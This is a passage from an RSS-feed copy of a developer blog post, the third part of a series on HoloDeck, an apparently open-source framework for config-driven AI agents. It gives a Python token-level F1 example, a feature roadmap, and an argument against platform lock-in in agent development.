&lt;strong&gt;Configuration Management&lt;/strong&gt; - Environment variable substitution, config merging, validation&lt;/li&gt;
&lt;/ul&gt;
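
&lt;p&gt;To make the evaluation side concrete, here's what token-level F1 looks like in plain Python. This is a generic illustration of the metric, not HoloDeck's implementation:&lt;/p&gt;

```python
from collections import Counter

def token_f1(reference: str, candidate: str) -> float:
    """Token-level F1 between a reference answer and a model answer."""
    ref = reference.lower().split()
    cand = candidate.lower().split()
    if not ref or not cand:
        return 0.0
    # Tokens shared between the two, respecting multiplicity.
    overlap = sum((Counter(ref) & Counter(cand)).values())
    if overlap == 0:
        return 0.0
    precision = overlap / len(cand)
    recall = overlap / len(ref)
    return 2 * precision * recall / (precision + recall)
```

&lt;p&gt;A partial answer like "the cat sat" against the reference "the cat sat on the mat" scores 2/3: perfect precision, but it only recalls half the reference tokens.&lt;/p&gt;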

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;Actively building:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;API Serving&lt;/strong&gt; - Deploy agents as REST APIs with FastAPI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability&lt;/strong&gt; - OpenTelemetry integration with GenAI semantic conventions&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Down the Road
&lt;/h2&gt;

&lt;p&gt;Eventually:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cloud Deployment&lt;/strong&gt; - Native integration with AWS, GCP, Azure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Agent Orchestration&lt;/strong&gt; - Advanced patterns for agent communication&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost Analytics&lt;/strong&gt; - LLM usage tracking and optimization&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  On Ownership
&lt;/h2&gt;

&lt;p&gt;Here's something that bothers me: we don't outsource our entire software development lifecycle to cloud providers. We choose our own version control, CI/CD, testing frameworks, deployment targets. Why should agents be different?&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Software Development&lt;/th&gt;
&lt;th&gt;Agent Development (today)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Git (self-hosted or any provider)&lt;/td&gt;
&lt;td&gt;Agent definitions (locked to platform)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD (Jenkins, GitHub Actions, GitLab)&lt;/td&gt;
&lt;td&gt;Testing &amp;amp; validation (vendor-specific)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Testing frameworks (Jest, pytest, JUnit)&lt;/td&gt;
&lt;td&gt;Evaluation (proprietary metrics)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment (your infrastructure)&lt;/td&gt;
&lt;td&gt;Runtime (cloud-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cloud platforms are convenient, but you give up:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Portability&lt;/strong&gt; - Your agent definitions are tied to proprietary formats&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexibility&lt;/strong&gt; - Limited to their supported models and patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost control&lt;/strong&gt; - Usage-based pricing that scales against you&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data sovereignty&lt;/strong&gt; - Your prompts and responses live on their servers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I wanted something different: portable YAML definitions, any LLM (cloud or local), your own evaluation criteria, deployment anywhere, and integration with your existing CI/CD. That's what HoloDeck is trying to be.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;HoloDeck focuses on a few things: config-driven agents, systematic testing, and fitting into your existing workflow. Not trying to be everything to everyone.&lt;/p&gt;

&lt;p&gt;If any of this resonates, check out the &lt;a href="https://docs.useholodeck.ai/" rel="noopener noreferrer"&gt;docs&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Series Recap
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://justinbarias.github.io//blog/holodeck-part1-problem" rel="noopener noreferrer"&gt;Part 1: Why It Feels Broken&lt;/a&gt; - The problem&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Part 2: What's Out There&lt;/a&gt; - The landscape&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Part 3: How HoloDeck Works&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>cli</category>
    </item>
  </channel>
</rss>
